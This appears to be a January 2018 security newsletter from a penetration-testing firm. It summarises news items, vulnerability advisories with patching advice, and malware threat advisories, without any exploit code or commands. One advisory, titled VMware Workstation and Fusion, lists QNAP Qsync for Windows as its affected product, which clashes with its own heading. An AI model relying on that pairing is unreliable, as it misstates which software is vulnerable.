Rampant Cybersecurity Bulletin
January 2018
Latest Cybersecurity News
The latest cybersecurity news so that you can stay on top of what is going on in the cybersecurity world. Click titles below for more details.
Meltdown and Spectre CPU Vulnerabilities Discovered
Reported: January 8, 2018
Details: A vulnerability affecting a large percentage of CPU chips have been discovered due to speculative execution and caching properties of the chips. The vulnerability could cause information leakage of critical information, such as encryption keys, to potential local attacker.
References:
Intel Warns Users not to Install its Meltdown and Spectre Patches
Reported: January 22, 2018
Details: Intel has warned users not to install Spectre and Meltdown patches due to buggy performance, including: blue screens, unpredictable system behavior, and unplanned reboots. Vendors are working with Intel for new BIOS patches and will update as they become available.
References:
Apple Hands Over Control Of Chinese Data Centers to Chinese Company
Reported: January 11, 2018
Details: In order to comply with Chinese government policy, Apple has handed control of its China based cloud infrastructure to a Chinese company. As part of the deal, both Apple and Guizhou-Cloud Big Data Industry will have access to user data stored in the Chinese iCloud.
References:
New WiFi Standard WPA3 Set to Be Launched Before End of 2018
Reported: January 10, 2018
Details: The WiFi alliance officially announced the WPA3 WiFi standard, meant to replace WPA2. It is scheduled to be released before the end of 2018.
References:
US Bill Aimed At Fining Companies Based on Information Breaches
Reported: January 10, 2018
Details: The United States Government is set to vote on a bill that would give the FTC the power to punish companies that have been hacked who had bad cybersecurity practices. The aim is to hold companies accountable for preventable data breaches. The punishments include fines on a per user, per piece of information basis.
References:
Hard-Coded Password Allows Hackers to Bypass Lenovo’s Fingerprint Scanner
Reported: January 30, 2018
Details: A wide range of Lenovoe Model laptops had a vulnerability which affected the fingerprint scanner. A weak encryption algorithm made it possible for someone with non-admin privileges to read logon credentials and fingerprint data.
References:
Remote Code Execution Vulnerability Discovered for Electron JS Framework
Reported: January 25, 2018
Details: Applications based on the ElectronJS framework such as Skype, GitHub Desktop, and Slack were found to be vulnerable to a remote code execution vulnerability due to a flaw in the Electron framework itself. The vulnerability affects apps that run on Microsoft Windows. A new version of the ElectronJS framework has been released to patch this vulnerability.
References:
Previous Cybersecurity Bulletins
Not sure if you are vulnerable? Rampant specializes in vulnerability assessments and penetration testing for small & mid-size businesses!
New High Risk Vulnerabilities
You should be aware of the following vulnerabilities, and we recommend patching them immediately if they apply to your systems. Click titles below for more details.
Cisco ASA webvpn Remote Code Execution
Reported: January 29, 2018
Affected Products:
- 3000 Series Industrial Security Appliance (ISA)
- ASA 5500 Series Adaptive Security Appliances
- ASA 5500-X Series Next-Generation Firewalls
- ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
- ASA 1000V Cloud Firewall
- Adaptive Security Virtual Appliance (ASAv)
- Firepower 2100 Series Security Appliance
- Firepower 4110 Security Appliance
- Firepower 9300 ASA Security Module
- Firepower Threat Defense Software (FTD)
Details: A remote attacker can execute arbitrary code on the system caused by a flaw in the SSL VPN function. An attacker can send XML packets to a webvpn configured interface and execute arbitrary code on the remote system.
Solution: Patch to the latest software when it becomes available.
Reference:
Apache NiFi Code Execution
Reported: January 12, 2018
Affected Products: Apache NiFi 1.0.0 and 1.4.0
Details: A remote attacker could execute arbitrary code on the system caused by improper handing of a malicious X-ProxyContextPath header containing embedded code.
Solution: Upgrade to the latest version of Apache NiFi (1.5.0 or later)
References:
CMS Made Simple Code Execution
Reported: January 2, 2018
Affected Products:
CMS Made Simple 2.1.6
CMS Made Simple 2.2.0
CMS Made Simple 2.2.1
Details: A remote attacker could execute arbitrary code on the system due to Smarty Templating Injection in some core modules
Solution: Upgrade to latest version of CMS Made Simple (2.2.2 or later)
References:
Oracle Virtualization VM VirtualBox Core
Reported: January 16, 2018
Affected Products:
Oracle VM VirtualBox 5.1.30
Oracle VM VirtualBox 5.2.4
Details: An unspecified vulnerability could allow an authenticated attacker to take control of the hypervisor.
Solution: Refer to Oracle Critical Patch Update Advisory for Patch.
Reference:
Sourcetree for Windows Command Execution
Reported: January 19, 2018
Affected Products:
Atlassian Sourcetree fore Windows 0.5.1.0
Atlassian Sourcetree fore Windows 2.4.6.0
Details: A remote authenticated attacker could execute arbitrary commands on the system caused by a flaw in Mercurial and Git repository handling.
Recommendation: Refer to Security Advisory for Patch.
References:
VMware Workstation and Fusion Code Execution
Reported: January 10, 2018
Affected Products: QNAP Qsync for Windows 4.2.2.0724
Details: A local authenticated attacker can execute arbitrary code on the system caused by an error in the IPv6 mode in the VMware NAT service.
Solution: Patch system to latest possible version using VMware security advisory.
References:
Linux Kernel Denial of Service
Reported: January 3, 2018
Affected Products: Linux Kernel 4.14.11
Details: Linux Kernel is vulnerable to a denial of service from a remote attacker due to an out of bounds write flaw via vectors including TLS.
Solution: Patch to the latest kernel when it becomes available.
Reference:
New Threat Advisories
You should be aware of the following threats and implement the recommended mitigations to ensure your systems are not impacted. Click titles below for more details.
RubyMiner Cryptocurrency Miner Targets Webservers
Reported: January 16, 2018
Details: A new malware package has been released based upon a variation of the Monero miner XMRig. The new package is targeting webservers that run PHP, Ruby on Rails, and IIS, utilizing a vulnerability in Ruby on Rails. Signs that a webserver is infected is if the crontab is downloading a robots.txt entry every hour.
Reference:
Smoke Loader Malware Disguised as Spectre/Meltdown Patch
Date: January 17, 2018
Description: Aiming to benefit from the confusion surrounding patching Spectre, criminals have been releasing their own “patches” which contain malware via phishing campaigns. The most notable is a website listed as “German Federal Office for Information Security”, which is engaging in a phishing campaign to entice consumers to download a patch from the website. The patch is known to contain Smoke Loader Malware, resulting in system compromise.
Recommendations:
1. Beware of suspicious emails, especially those proclaiming to have patches for Spectre or Metldown.
2. Always download patches from a vendor site, not 3-rd parties.
Resources:
IBM Published 2017 Data Breach Review
Reported: January 18, 2018
Details: IBM published a detailed report of security incidents, including information about number of leaked records, breaches by industry, and breach by attack type. The report is linked below.
References:
Espionage Campaign "Dark Caracal" Believed to be Run by Lebanese Government
Reported: January 23, 2018
Details: A new espionage campaign, named “Dark Caracal”, targets Android phones. This campaign is thought to be the first Mobile APT used at a global scale. Attackers are using numerous ways to infect victims, including fake WhatsApp messages. The malware does not use zero-day exploits, but rather relies on permissions given to it upon install. Some programs installed via the campaign matched the original, non-malicious program, in functionality.
References: